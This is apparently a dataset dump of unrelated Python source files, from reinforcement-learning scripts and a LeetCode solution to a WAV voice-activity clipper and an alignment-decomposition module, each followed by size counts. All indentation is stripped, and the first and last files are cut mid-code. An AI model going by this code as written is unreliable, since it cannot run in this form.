def handle_val(self, term: Val, ctx: Context[TermOp]) -> bool:
return self.value == term.value
class BindVar(TermOp):
def handle_term(self, term: Term, ctx: Context[TermOp]) -> bool:
ctx.push_var(term)
return True
class MatchVar(TermOp):
def __init__(self, idx: int):
self.idx = idx
def handle_term(self, term: Term, ctx: Context[TermOp]) -> bool:
return ctx.get_var(self.idx) == term
class MatchAny(TermOp):
def handle_term(self, term: Term, ctx: Context[TermOp]) -> bool:
return True
def func(name: str, *args: PatternBuilder[TermOp]) -> PatternBuilder[TermOp]:
builder = PatternBuilder[TermOp].from_op(
ConstantOpBuilder(MatchFunc(name, len(args)))
)
for arg in args:
builder = builder.concat(arg)
return builder
def val(value: str) -> PatternBuilder[TermOp]:
return PatternBuilder.from_op(ConstantOpBuilder(MatchVal(value)))
def v(name: str) -> PatternBuilder[TermOp]:
return PatternBuilder.from_op(VarOpBuilder(name, BindVar, MatchVar))
_ = PatternBuilder.from_op(ConstantOpBuilder(MatchAny()))
| 2,450 | 795 |
from .wrapper import create_optim_wrapper | 41 | 10 |
import json
import gzip
import argparse
"""
Decompresses GZ file to JSON file
"""
def decompress_gz_to_json(gz_path, save_path):
with gzip.open(gz_path, "rt", encoding="utf-8") as f:
decompressed = json.load(f)
with open(save_path, 'w') as f:
f.write(json.dumps(decompressed, indent=4, sort_keys=True))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Decompress GZ file to JSON file")
parser.add_argument(
"--gz_path", type=str, required=True, help="Location of .gz file to be decompressed"
)
parser.add_argument(
"--save_path", type=str, required=True, help="Location to save file as .json"
)
args = parser.parse_args()
gz_path = args.gz_path
save_path = args.save_path
decompress_gz_to_json(gz_path, save_path)
| 820 | 290 |
import fixture
import nose
import requests
import os
import pprint
import time
def get_times(response):
"""
Parse a response from a watch script to get the reported times.
:param response: the response from a requests.get call.
:returns: a dictionary of parsed times.
"""
times = {}
for part in response.content.split("Watch ")[1:]:
name = part.split(" [")[0]
timestamp = part.split(" [")[1].split("]")[0]
times[name] = timestamp
pprint.pprint(times)
return times
def start_tangelo():
"""Start tangelo with the watch plugin."""
return fixture.start_tangelo("--watch")
def touch_file(path):
"""
Use os.utime to touch a file, but add a delay to make sure things have a
chance to change.
:param path: path to touch.
"""
time.sleep(2)
os.utime(path, None)
@nose.with_setup(start_tangelo, fixture.stop_tangelo)
def test_watch_plugin():
times = []
# Check the original time
response = requests.get(fixture.url("watch_a"))
assert "Watch A" in response.content
times.append(get_times(response))
# Calling this again shouldn't change any import time.
response = requests.get(fixture.url("watch_a"))
times.append(get_times(response))
assert times[-2] == times[-1]
# Touch script A and check that we now get a new time for A, but not for
# the sub scripts.
touch_file("tests/web/watch_a.py")
response = requests.get(fixture.url("watch_a"))
times.append(get_times(response))
assert times[-2]["A"] != times[-1]["A"]
assert times[-2]["B"] == times[-1]["B"]
assert times[-2]["C"] == times[-1]["C"]
assert times[-2]["D"] == times[-1]["D"]
# Touch script B and check that script A updates with that, too.
touch_file("tests/web/watch_b.py")
response = requests.get(fixture.url("watch_a"))
times.append(get_times(response))
assert times[-2]["A"] != times[-1]["A"]
assert times[-2]["B"] != times[-1]["B"]
assert times[-2]["C"] == times[-1]["C"]
assert times[-2]["D"] == times[-1]["D"]
# And again with script D which is several layers in
touch_file("tests/web/watch_d.py")
response = requests.get(fixture.url("watch_a"))
times.append(get_times(response))
assert times[-2]["A"] != times[-1]["A"]
assert times[-2]["B"] != times[-1]["B"]
assert times[-2]["C"] != times[-1]["C"]
assert times[-2]["D"] != times[-1]["D"]
# Touching script C and then loading E should show a new C time
touch_file("tests/web/watch_c.py")
response = requests.get(fixture.url("watch_e"))
times.append(get_times(response))
assert times[-2]["C"] != times[-1]["C"]
assert times[-2]["D"] == times[-1]["D"]
# Touch script B. Calling E should not show any difference in times.
touch_file("tests/web/watch_b.py")
response = requests.get(fixture.url("watch_e"))
times.append(get_times(response))
assert times[-2] == times[-1]
# All done
| 2,981 | 1,005 |
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def pathSum(self, root, sum):
"""
:type root: TreeNode
:type sum: int
:rtype: bool
"""
ret = []
if not root:
return ret
curr = [root.val]
def dfs(root, sum):
if sum == 0 and root.left is None and root.right is None:
print(curr)
ret.append(curr[:])
for n in [root.left, root.right]:
if n is not None:
curr.append(n.val)
dfs(n, sum-n.val)
curr.pop()
dfs(root, sum-root.val)
return ret
class Solution:
def pathSum(self, root, sum):
"""
:type root: TreeNode
:type sum: int
:rtype: List[List[int]]
"""
if not root:
return []
Solution.res = []
def helper(root, sum, path):
if not root.left and not root.right and sum == root.val:
Solution.res.append(path+[root.val])
return
helper(root.left, sum-root.val, path+[root.val])
helper(root.right, sum-root.val, path+[root.val])
helper(root,sum,[])
return Solution.res | 1,394 | 414 |
#pip install tensorflow==1.15
#Install stable-baselines as described in the documentation
import sys
import model
from model import FullyConvPolicyBigMap, FullyConvPolicySmallMap, CustomPolicyBigMap, CustomPolicySmallMap
from utils import get_exp_name, max_exp_idx, load_model, make_vec_envs
from stable_baselines import PPO2
from stable_baselines.results_plotter import load_results, ts2xy
import tensorflow as tf
import numpy as np
import os
n_steps = 0
log_dir = 'runs'
best_mean_reward, n_steps = -np.inf, 0
def callback(_locals, _globals):
"""
Callback called at each step (for DQN an others) or after n steps (see ACER or PPO2)
:param _locals: (dict)
:param _globals: (dict)
"""
global n_steps, best_mean_reward
# Print stats every 1000 calls
if (n_steps + 1) % 10 == 0:
x, y = ts2xy(load_results(log_dir), 'timesteps')
# print(f"len(x) is {len(x)}")
if len(x) > 100:
#pdb.set_trace()
mean_reward = np.mean(y[-100:])
# print(x[-1], 'timesteps')
print("Best mean reward: {:.2f} - Last mean reward per episode: {:.2f}".format(best_mean_reward, mean_reward))
# New best model, we save the agent here
if mean_reward > best_mean_reward:
best_mean_reward = mean_reward
# Example for saving best model
print(f"Saving new best model: idx {n_steps}")
_locals['self'].model.save(os.path.join(log_dir, f'best_model.pkl'))
else:
_locals['self'].model.save(os.path.join(log_dir, 'latest_model.pkl'))
else:
# print('{} monitor entries'.format(len(x)))
pass
n_steps += 1
# Returning False will stop training early
return True
def main(game, representation, experiment, steps, n_cpu, render, logging, **kwargs):
env_name = '{}-{}-v0'.format(game, representation)
exp_name = get_exp_name(game, representation, experiment, **kwargs)
resume = kwargs.get('resume', False)
if representation == 'wide':
policy = FullyConvPolicyBigMap
if game == "sokoban":
policy = FullyConvPolicySmallMap
else:
policy = CustomPolicyBigMap
if game == "sokoban":
policy = CustomPolicySmallMap
if game == "binary":
kwargs['cropped_size'] = 28
elif game == "zelda":
kwargs['cropped_size'] = 22
elif game == "sokoban":
kwargs['cropped_size'] = 10
n = max_exp_idx(exp_name)
global log_dir
if not resume:
n = n + 1
log_dir = 'runs/{}_{}_{}'.format(exp_name, n, 'log')
# os.mkdir(log_dir)
if not resume:
os.mkdir(log_dir)
else:
model = load_model(log_dir)
kwargs = {
**kwargs,
'render_rank': 0,
'render': render,
}
used_dir = log_dir
if not logging:
used_dir = None
env = make_vec_envs(env_name, representation, log_dir, n_cpu, **kwargs)
# print(f"\nenv from make_vec_envs: {env}\n")
#if not resume or model is None:
if not resume:
model = PPO2(policy, env, verbose=1, n_steps=16, tensorboard_log="./runs")
# print(f"policy: {policy}")
# print(f"\nmake_vec_envs params: \n"
# f"env_name: {env_name}\n"
# f"representation: {representation},\n"
# f"log_dir: {log_dir}, \n"
# f"n_cpu: {n_cpu}\n"
# f"**kwargs: {kwargs}")
else:
if 'orderless' in env_name:
model = PPO2.load("/Users/matt/pcgil2/pcgil2/runs/zeldaorderless_wide_zeldaorderless_7_log/best_model.pkl")
else:
model = PPO2.load("/Users/matt/pcgil2/pcgil2/runs/zeldaham_wide_zeldahamm_4_log/best_model.pkl")
model.set_env(env)
if not logging:
model.learn(total_timesteps=int(steps), tb_log_name=exp_name)
else:
model.learn(total_timesteps=int(steps), tb_log_name=exp_name, callback=callback)
################################## MAIN ########################################
#game = 'zeldaham'
game = 'zeldaorderless'
representation = 'wide'
experiment = 'zeldaorderless'
# experiment = 'zeldahamm'
#steps = 1e8
steps = 1e6
render = False
logging = True
# n_cpu = 50
n_cpu = 8
kwargs = {
'resume': True
}
if __name__ == '__main__':
main(game, representation, experiment, steps, n_cpu, render, logging, **kwargs)
| 4,405 | 1,533 |
import numpy as np
import torch
from torch import nn
from torch.autograd import Variable
from copy import deepcopy
from gym.spaces import Dict
from rllab.misc.instrument import VariantGenerator
import rlkit.torch.pytorch_util as ptu
from rlkit.envs.wrappers import NormalizedBoxEnv
from rlkit.launchers.launcher_util import setup_logger, set_seed
from rlkit.envs import get_meta_env, get_meta_env_params_iters
from rlkit.envs.wrappers import ScaledMetaEnv
from rlkit.torch.sac.policies import ReparamTanhMultivariateGaussianPolicy
from rlkit.torch.networks import Mlp
from rlkit.torch.irl.few_shot_LfD_upper_bound import UpperBound
from rlkit.torch.irl.encoders.mlp_encoder import TimestepBasedEncoder, WeightShareTimestepBasedEncoder
from rlkit.torch.irl.encoders.conv_seq_encoder import ConvTrajEncoder, R2ZMap, Dc2RMap, NPEncoder
import yaml
import argparse
import importlib
import psutil
import os
from os import path
import argparse
import joblib
from time import sleep
EXPERT_LISTING_YAML_PATH = '/h/kamyar/oorl_rlkit/rlkit/torch/irl/experts.yaml'
def experiment(variant):
with open(EXPERT_LISTING_YAML_PATH, 'r') as f:
listings = yaml.load(f.read())
expert_dir = listings[variant['expert_name']]['exp_dir']
specific_run = listings[variant['expert_name']]['seed_runs'][variant['expert_seed_run_idx']]
file_to_load = path.join(expert_dir, specific_run, 'extra_data.pkl')
extra_data = joblib.load(file_to_load)
# this script is for the non-meta-learning airl
train_context_buffer, train_test_buffer = extra_data['meta_train']['context'], extra_data['meta_train']['test']
test_context_buffer, test_test_buffer = extra_data['meta_test']['context'], extra_data['meta_test']['test']
# set up the envs
env_specs = variant['env_specs']
meta_train_env, meta_test_env = get_meta_env(env_specs)
# set up the policy and training algorithm
obs_dim = int(np.prod(meta_train_env.observation_space.spaces['obs'].shape))
action_dim = int(np.prod(meta_train_env.action_space.shape))
print('obs dim: %d' % obs_dim)
print('act dim: %d' % action_dim)
sleep(3)
# make the disc model
z_dim = variant['algo_params']['z_dim']
# make the MLP
hidden_sizes = [variant['algo_params']['mlp_hid_dim']] * variant['algo_params']['mlp_layers']
obs_task_params_dim = int(np.prod(meta_train_env.observation_space.spaces['obs_task_params'].shape))
mlp = Mlp(
hidden_sizes,
output_size=obs_task_params_dim if variant['algo_params']['training_regression'] else 1,
input_size=z_dim if variant['algo_params']['training_regression'] else z_dim + 2*obs_task_params_dim,
batch_norm=variant['algo_params']['mlp_use_bn']
)
# Make the encoder
encoder = TimestepBasedEncoder(
2*obs_dim + action_dim, #(s,a,s')
variant['algo_params']['r_dim'],
variant['algo_params']['z_dim'],
variant['algo_params']['enc_hid_dim'],
variant['algo_params']['r2z_hid_dim'],
variant['algo_params']['num_enc_layer_blocks'],
hid_act='relu',
use_bn=True,
within_traj_agg=variant['algo_params']['within_traj_agg']
)
# ---------------
# encoder = WeightShareTimestepBasedEncoder(
# obs_dim,
# action_dim,
# 64,
# variant['algo_params']['r_dim'],
# variant['algo_params']['z_dim'],
# variant['algo_params']['enc_hid_dim'],
# variant['algo_params']['r2z_hid_dim'],
# variant['algo_params']['num_enc_layer_blocks'],
# hid_act='relu',
# use_bn=True,
# within_traj_agg=variant['algo_params']['within_traj_agg']
# )
# ---------------
# traj_enc = ConvTrajEncoder(
# variant['algo_params']['np_params']['traj_enc_params']['num_conv_layers'],
# # obs_dim + action_dim,
# obs_dim + action_dim + obs_dim,
# variant['algo_params']['np_params']['traj_enc_params']['channels'],
# variant['algo_params']['np_params']['traj_enc_params']['kernel'],
# variant['algo_params']['np_params']['traj_enc_params']['stride'],
# )
# Dc2R_map = Dc2RMap(
# variant['algo_params']['np_params']['Dc2r_params']['agg_type'],
# traj_enc,
# state_only=False
# )
# r2z_map = R2ZMap(
# variant['algo_params']['np_params']['r2z_params']['num_layers'],
# variant['algo_params']['np_params']['traj_enc_params']['channels'],
# variant['algo_params']['np_params']['r2z_params']['hid_dim'],
# variant['algo_params']['z_dim']
# )
# encoder = NPEncoder(
# Dc2R_map,
# r2z_map,
# )
train_task_params_sampler, test_task_params_sampler = get_meta_env_params_iters(env_specs)
algorithm = UpperBound(
meta_train_env,
train_context_buffer,
train_test_buffer,
test_context_buffer,
test_test_buffer,
mlp,
encoder,
**variant['algo_params']
)
if ptu.gpu_enabled():
algorithm.cuda()
algorithm.train()
return 1
if __name__ == '__main__':
# Arguments
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--experiment', help='experiment specification file')
args = parser.parse_args()
with open(args.experiment, 'r') as spec_file:
spec_string = spec_file.read()
exp_specs = yaml.load(spec_string)
if exp_specs['use_gpu']:
print('\n\nUSING GPU\n\n')
ptu.set_gpu_mode(True)
exp_id = exp_specs['exp_id']
exp_prefix = exp_specs['exp_name']
seed = exp_specs['seed']
set_seed(seed)
setup_logger(exp_prefix=exp_prefix, exp_id=exp_id, variant=exp_specs)
experiment(exp_specs)
| 5,752 | 2,081 |
# Copyright 2012-2014 Brian May
#
# This file is part of python-tldap.
#
# python-tldap is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# python-tldap is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with python-tldap If not, see <http://www.gnu.org/licenses/>.
import six
import copy
class CaseInsensitiveDict(dict):
"""
Case insensitve dictionary for searches however preserves the case for
retrieval.
"""
def __init__(self, d={}):
self.lc = {}
for k, v in six.iteritems(d):
self.lc[k.lower()] = k
super(CaseInsensitiveDict, self).__init__(d)
def __setitem__(self, key, value):
try:
old_key = self.lc[key.lower()]
except KeyError:
pass
else:
if key != old_key:
super(CaseInsensitiveDict, self).__delitem__(old_key)
self.lc[key.lower()] = key
super(CaseInsensitiveDict, self).__setitem__(key, value)
def __delitem__(self, key):
key = self.lc[key.lower()]
del self.lc[key.lower()]
super(CaseInsensitiveDict, self).__delitem__(key)
def __getitem__(self, key):
key = self.lc[key.lower()]
return super(CaseInsensitiveDict, self).__getitem__(key)
def __contains__(self, key):
try:
key = self.lc[key.lower()]
except KeyError:
return False
else:
return super(CaseInsensitiveDict, self).__contains__(key)
def get(self, key, default=None):
try:
key = self.lc[key.lower()]
except KeyError:
return default
else:
return super(CaseInsensitiveDict, self).get(key, default)
def get_correct_key(self, key):
return self.lc[key.lower()]
def __copy__(self):
clone = self.__class__()
for k, v in six.iteritems(self):
clone[k] = v
return clone
def __deepcopy__(self, memo):
clone = self.__class__()
for k, v in six.iteritems(self):
clone[k] = copy.deepcopy(v, memo)
return clone
| 2,535 | 801 |
import torch
__all__ = ["get", "is_external_optimizer"]
def is_external_optimizer(optimizer):
return False
def get(params, optimizer, learning_rate=None, decay=None):
"""Retrieves an Optimizer instance."""
if isinstance(optimizer, torch.optim.Optimizer):
return optimizer
if learning_rate is None and optimizer not in ["L-BFGS", "L-BFGS-B"]:
raise ValueError("No learning rate for {}.".format(optimizer))
if decay is not None:
# TODO: learning rate decay
raise NotImplementedError(
"learning rate decay to be implemented for backend pytorch."
)
if optimizer == "adam":
return torch.optim.Adam(params, lr=learning_rate)
if optimizer in ["L-BFGS", "L-BFGS-B"]:
# TODO: L-BFGS parameters
return torch.optim.LBFGS(params, lr=1, max_iter=20)
raise NotImplementedError(f"{optimizer} to be implemented for backend pytorch.")
| 933 | 299 |
from __future__ import unicode_literals
import json
import vmraid
import vmraid.defaults
from vmraid.desk.like import _toggle_like
from six import string_types
def execute():
for user in vmraid.get_all("User"):
username = user["name"]
bookmarks = vmraid.db.get_default("_bookmarks", username)
if not bookmarks:
continue
if isinstance(bookmarks, string_types):
bookmarks = json.loads(bookmarks)
for opts in bookmarks:
route = (opts.get("route") or "").strip("#/ ")
if route and route.startswith("Form"):
try:
view, doctype, docname = opts["route"].split("/")
except ValueError:
continue
if vmraid.db.exists(doctype, docname):
if (doctype=="DocType"
or int(vmraid.db.get_value("DocType", doctype, "issingle") or 0)
or not vmraid.db.table_exists(doctype)):
continue
_toggle_like(doctype, docname, add="Yes", user=username)
| 899 | 358 |
# coding=utf-8
__author__ = 'NXG'
import os, wave
import contextlib
import collections
from math import ceil
from dataprovider.create.data_management import mik_dir
saved_original_voice_path = '/data/validation_clip/'
def read_wave(path):
with contextlib.closing(wave.open(path, 'rb')) as wf:
"""
wave file basic info:
_wave_params:
nchannels=1,
sampwidth=2,
framerate=8000,
nframes=1088000,
comptype='NONE',
compname='not compressed'
"""
num_channels = wf.getnchannels()
print('voice channel is:', num_channels)
assert num_channels == 1
sample_width = wf.getsampwidth()
# assert sample_width == 2
sample_rate = wf.getframerate()
assert sample_rate in (8000, 16000, 32000) #
pcm_data = wf.readframes(wf.getnframes()) # nframs is: 1088000 read all data one time
# note: len of pcm_data is 2176000
print('the voice length is:{} and sample_rate is:{}'.format(len(pcm_data), sample_rate))
return pcm_data, sample_rate # return row data & sample rate
def write_wave(write_path, audio, sample_rate):
print('write path:', (write_path, sample_rate))
wf = wave.open(write_path, 'wb') # mik_dir
wf.setnchannels(1)
wf.setsampwidth(2)
wf.setframerate(sample_rate)
wf.writeframes(audio)
wf.close()
class Frame(object):
def __init__(self, bytes, timestamp, duration):
self.bytes = bytes
self.timestamp = timestamp
self.duration = duration
def frame_collect(frame_duration_ms, audio, sample_rate):
# audio: all the data
frame_segment = []
n = int(sample_rate * (frame_duration_ms / 1000.0) * 2) # 30ms 30ms / 1000ms 2 <-> s bytes
offset = 0
timestamp = 0.0
duration = (float(n) / sample_rate) / 2.0 # sub second
while offset + n < len(audio): # if 1s n = 8000*2
"""
0-8000*2 0.0 1
8000*2- 8000*2+8000 1, 1
8000*2+8000- 8000*2+8000+8000 2 1
"""
frame_segment.append(Frame(audio[offset:offset + n], timestamp, duration))
timestamp += duration
offset += n
print('collect all frams:', len(frame_segment))
return frame_segment # 4533
def vad_check(sample_rate, frame_duration_ms, padding_duration_ms, frames, write_path):
num_padding_frames = int(padding_duration_ms // frame_duration_ms) # 3000 /30 100 frame
ring_buffer = collections.deque(maxlen=num_padding_frames)
for index_, frame in enumerate(frames):
ring_buffer.append(frame)
human_voiced = b''.join([seg.bytes for seg in ring_buffer])
human_voiced_len = len(human_voiced)
if human_voiced_len < 16000: # human voice length less than 0.5s
ring_buffer.clear()
return False # not human voice
else:
if human_voiced_len < 16000 * 6: # human voice length in [0.5s, 1s]
full_human_voice_length = 16000 * 6
copy_num = ceil(full_human_voice_length / human_voiced_len)
for copy_step in range(0, copy_num, 1):
human_voiced = human_voiced.__add__(human_voiced) # Modify here
write_wave(write_path, human_voiced, sample_rate)
return True
def check(*path):
audio, sample_rate = read_wave(path[1]) # read the wav format voice data
frames = frame_collect(30, audio, sample_rate)
frames = list(frames)
segments = vad_check(sample_rate, 30, len(frames) * 30, frames, path[2])
print('segments:', segments)
return segments
# 语音流是否小于3秒
if __name__ == '__main__':
path = 'D:/save'
save_path_root = 'D"/enrance_voice'
dir_path = os.listdir(path)
for cur_path in dir_path:
name = os.listdir(os.path.join(path, cur_path))
for cur_name in name:
cur_name = os.path.join(path, cur_path, cur_name) # 音频文件全路径
save_name = os.path.join(save_path_root, cur_path, cur_name)
check(3, cur_name, save_name)
| 4,061 | 1,473 |
from AlignmentPracticableRepa import *
import logging
from timeit import default_timer as timer
from sys import stdout
# logging.basicConfig(format='%(asctime)s : %(name)s : %(message)s', datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO)
# logging.basicConfig(format='%(message)s', level=logging.INFO)
logging.basicConfig(format='%(message)s')
layerer_log = logging.getLogger('layerer')
layerer_log.setLevel(logging.INFO)
tupler_log = logging.getLogger('tupler')
tupler_log.setLevel(logging.INFO)
parter_log = logging.getLogger('parter')
parter_log.setLevel(logging.INFO)
roller_log = logging.getLogger('roller')
roller_log.setLevel(logging.INFO)
applier_log = logging.getLogger('applier')
applier_log.setLevel(logging.INFO)
dervarser_log = logging.getLogger('dervarser')
dervarser_log.setLevel(logging.INFO)
decomper_log = logging.getLogger('decomper')
decomper_log.setLevel(logging.INFO)
# parametersSystemsLayererMaxRollByMExcludedSelfHighestIORepa_u ::
# Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer ->
# System -> Set.Set Variable -> HistoryRepa -> HistogramRepaRed -> HistoryRepa -> HistogramRepaRed -> Integer ->
# IO (System, Fud, [(Set.Set Variable, Double)])
def parametersSystemsLayererMaxRollByMExcludedSelfHighestIORepa_u(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,uu,vv,xx,xxp,xxrr,xxrrp,f):
repaRounding = 1e-6
def sgl(x):
return sset([x])
def maxr(mm):
if len(mm) > 0:
return list(sset([b for (_,b) in mm]))[-1:][0]
return 0
uvars = systemsSetVar
cart = systemsSetVarsSetStateCartesian_u
lluu = listsSystem_u
uunion = pairSystemsUnion
sunion = pairStatesUnionLeft
ssgl = stateSingleton
llaa = listsHistogram_u
hhvvr = historyRepasVectorVar
apvvr = histogramRepaRedsVectorVar
hrhx = historyRepasRed
def unit(qq):
return llaa([(ss,1) for ss in qq])
tttr = systemsTransformsTransformRepa_u
apply = historyRepasListTransformRepasApply_u
trans = histogramsSetVarsTransform_u
ttpp = transformsPartition
und = transformsUnderlying
qqff = setTransformsFud_u
ffqq = fudsSetTransform
def funion(ff,gg):
return qqff(ffqq(ff) | ffqq(gg))
def buildfftup(uu,vv,ff,hh,hhp,hhrr,hhrrp):
return parametersSystemsBuilderTupleNoSumlayerMultiEffectiveRepa_ui(xmax,omax,bmax,mmax,uu,vv,ff,hh,hhp,hhrr,hhrrp)
def parter(uu,kk,bb,y1):
return parametersSystemsPartitionerMaxRollByMRepa_ui(mmax,umax,pmax,uu,kk,bb,y1)
def roller(qq):
return parametersRollerMaximumRollExcludedSelfRepa_i(qq)
def buildffdervar(uu,vv,ff,xx,xxp,xxrr,xxrrp):
(x1,s1) = parametersSystemsBuilderDerivedVarsHighestNoSumlayerRepa_ui(wmax,omax,uu,vv,ff,xx,xxp,xxrr,xxrrp)
return ([(kk,a) for ((kk,_,_),a) in x1],s1)
def layer(vv,uu,ff,mm,xx,xxp,xxrr,xxrrp,f,l):
if l > lmax:
return (uu,ff,mm)
layerer_log.info(">>> layer\tfud: %d\tlayer: %d" % (f,l))
t1 = timer()
tupler_log.info(">>> tupler")
tupler_log.info("substrate cardinality: %d" % len(vv))
tupler_log.info("fud cardinality: %d" % len(ffqq(ff)))
stdout.flush()
(x2,s2) = buildfftup(uu,vv,ff,xx,xxp,xxrr,xxrrp)
if len(x2) > 0:
tupler_log.info("tuple cardinality: %d" % len(x2))
tupler_log.info("max tuple algn: %.2f" % max([b for (a,b) in x2]))
else:
tupler_log.info("no tuples")
t2 = timer()
tupler_log.info("tupler\tsearched: %d\trate: %.2f" % (s2,s2/(t2-t1)))
tupler_log.info("<<< tupler %.3fs" % (t2-t1))
parter_log.info(">>> parter")
stdout.flush()
y3 = [parter(uu,kk,bb,y1) for ((kk,bb),y1) in x2]
x3 = [x for (ll,_) in y3 for x in ll]
s3 = sum([s for (_,s) in y3])
if len(x3) > 0:
parter_log.info("partitions cardinality: %d" % len(x3))
else:
parter_log.info("no tuple partitions")
t3 = timer()
parter_log.info("parter\tsearched: %d\trate: %.2f" % (s3,s3/(t3-t2)))
parter_log.info("<<< parter %.3fs" % (t3-t2))
roller_log.info(">>> roller")
stdout.flush()
y4 = [roller(qq) for qq in x3]
x4 = [x for (ll,_) in y4 for x in ll]
s4 = sum([s for (_,s) in y4])
if len(x4) > 0:
roller_log.info("roll cardinality: %d" % len(x4))
else:
roller_log.info("no rolls")
t4 = timer()
roller_log.info("roller\tsearched: %d\trate: %.2f" % (s4,s4/(t4-t3)))
roller_log.info("<<< roller %.3fs" % (t4-t3))
applier_log.info(">>> application")
stdout.flush()
ll0 = []
for (yy,pp) in x4:
for (jj,p) in zip(yy,pp):
if max(p) + 1 < len(p):
ii = list(zip(cart(uu,jj),p))
ll0.append(ii)
ll = []
for (b,ii) in enumerate(ll0):
w = VarPair((VarPair((VarInt(f),VarInt(l))),VarInt(b+1)))
ww = sset([ValInt(u) for (_,u) in ii])
tt = trans(unit([sunion(ss,ssgl(w,ValInt(u))) for (ss,u) in ii]),sgl(w))
ll.append((tt,(w,ww)))
ll1 = []
for (tt,(w,ww)) in ll:
if all([len(ww) != len(ww1) or und(tt) != und(tt1) or ttpp(tt) != ttpp(tt1) for (tt1,(w1,ww1)) in ll if w > w1]):
ll1.append((tt,(w,ww)))
if len(ll1) > 0:
hh = qqff(sset([tt for (tt,_) in ll1]))
uu1 = uunion(uu,lluu([(w,ww) for (_,(w,ww)) in ll1]))
ffr = [tttr(uu1,tt) for (tt,_) in ll1]
xx1 = apply(xx,ffr)
xxp1 = hrhx(xx1)
xxrr1 = apply(xxrr,ffr)
xxrrp1 = hrhx(xxrr1)
gg = funion(ff,hh)
applier_log.info("fud cardinality: %d" % len(ffqq(gg)))
t5 = timer()
applier_log.info("<<< application %.3fs" % (t5-t4))
dervarser_log.info( ">>> dervarser")
stdout.flush()
(mm1,s5) = buildffdervar(uu1,vv,gg,xx1,xxp1,xxrr1,xxrrp1)
if len(mm1) > 0:
dervarser_log.info("der vars algn density: %.2f" % maxr(mm1))
else:
dervarser_log.info("no der vars sets")
t6 = timer()
dervarser_log.info("dervarser\tsearched: %d\trate: %.2f" % (s5,s5/(t6-t5)))
dervarser_log.info("<<< dervarser %.3fs" % (t6-t5))
layerer_log.info( "<<< layer %.3fs" % (t6-t1))
stdout.flush()
if l <= lmax and (len(mm) == 0 or maxr(mm1) > maxr(mm) + repaRounding):
(ffr,ll0,ll,ll1) = (None,None,None,None)
(x2,x3,x4) = (None,None,None)
return layer(vv,uu1,gg,mm1,xx1,xxp1,xxrr1,xxrrp1,f,l+1)
else:
t5 = timer()
applier_log.info("<<< application %.3fs" % (t5-t4))
layerer_log.info( "<<< layer %.3fs" % (t5-t1))
stdout.flush()
return (uu,ff,mm)
layerer_log.info(">>> layerer")
t1 = timer()
x1 = layer(vv,uu,fudEmpty(),[],xx,xxp,xxrr,xxrrp,f,1)
t2 = timer()
layerer_log.info("<<< layerer %.3fs" % (t2-t1))
stdout.flush()
return x1
# parametersSystemsHistoryRepasDecomperMaxRollByMExcludedSelfHighestFmaxIORepa ::
# Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer -> Integer ->
# Integer -> Integer ->
# System -> Set.Set Variable -> HistoryRepa ->
# IO (Maybe (System, DecompFud))
def parametersSystemsHistoryRepasDecomperMaxRollByMExcludedSelfHighestFmaxIORepa(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,fmax,mult,seed,uu,vv,aa):
repaRounding = 1e-6
dom = relationsDomain
def maxd(mm):
if len(mm) > 0:
return list(sset([(b,a) for (a,b) in mm]))[-1]
return (0,sset())
def tsgl(r):
return sdict([(r,sdict())])
uvars = systemsSetVar
acard = histogramsCardinality
trim = histogramsTrim
aall = histogramsList
def red(aa,vv):
return setVarsHistogramsReduce(vv,aa)
def unit(ss):
return setStatesHistogramUnit(sset([ss]))
aahh = histogramsHistory
hhhr = systemsHistoriesHistoryRepa
def vars(hr):
return sset(historyRepasVectorVar(hr))
size = historyRepasSize
rraa = systemsHistogramRepasHistogram
hrhx = historyRepasRed
def hrhrred(hr,vv):
return setVarsHistoryRepasHistoryRepaReduced(vv,hr)
def hrred(hr,vv):
return setVarsHistoryRepasReduce(1,vv,hr)
def reduce(uu,ww,hh):
return rraa(uu,hrred(hh,ww))
def select(uu,ss,hh):
return historyRepasHistoryRepasHistoryRepaSelection_u(hhhr(uu,aahh(unit(ss))),hh)
hrconcat = vectorHistoryRepasConcat_u
hrshuffle = historyRepasShuffle_u
ffqq = fudsSetTransform
fder = fudsDerived
tttr = systemsTransformsTransformRepa_u
def apply(uu,ff,hh):
return historyRepasListTransformRepasApply(hh,[tttr(uu,tt) for tt in ffqq(ff)])
depends = fudsSetVarsDepends
zzdf = treePairStateFudsDecompFud
dfzz = decompFudsTreePairStateFud
def zztrim(df):
pp = []
for ll in treesPaths(df):
(_,ff) = ll[-1]
if len(ff) == 0:
pp.append(ll[:-1])
else:
pp.append(ll)
return pathsTree(pp)
def layerer(uu,xx,f):
decomper_log.info(">>> repa shuffle")
stdout.flush()
t1 = timer()
z = size(xx)
xxrr = hrconcat([hrshuffle(xx,seed+i*z) for i in range(1,mult+1)])
t2 = timer()
decomper_log.info("<<< repa shuffle %.3fs" % (t2-t1))
decomper_log.info(">>> repa perimeters")
stdout.flush()
t1 = timer()
xxp = hrhx(xx)
xxrrp = hrhx(xxrr)
t2 = timer()
decomper_log.info("<<< repa perimeters %.3fs" % (t2-t1))
return parametersSystemsLayererMaxRollByMExcludedSelfHighestIORepa_u(wmax,lmax,xmax,omax,bmax,mmax,umax,pmax,uu,vv,xx,xxp,xxrr,xxrrp,f)
def decomp(uu,zz,qq,f):
if len(zz) == 0:
(uur,ffr,nnr) = layerer(uu,aa,f)
if len(ffr) == 0 or len(nnr) == 0:
return (uu, decompFudEmpty())
(ar,kkr) = maxd(nnr)
if ar <= repaRounding:
return (uu, decompFudEmpty())
decomper_log.info(">>> slicing")
stdout.flush()
t3 = timer()
ffr1 = depends(ffr,kkr)
decomper_log.info("dependent fud cardinality : %d" % len(ffqq(ffr1)))
aar = apply(uur,ffr1,aa)
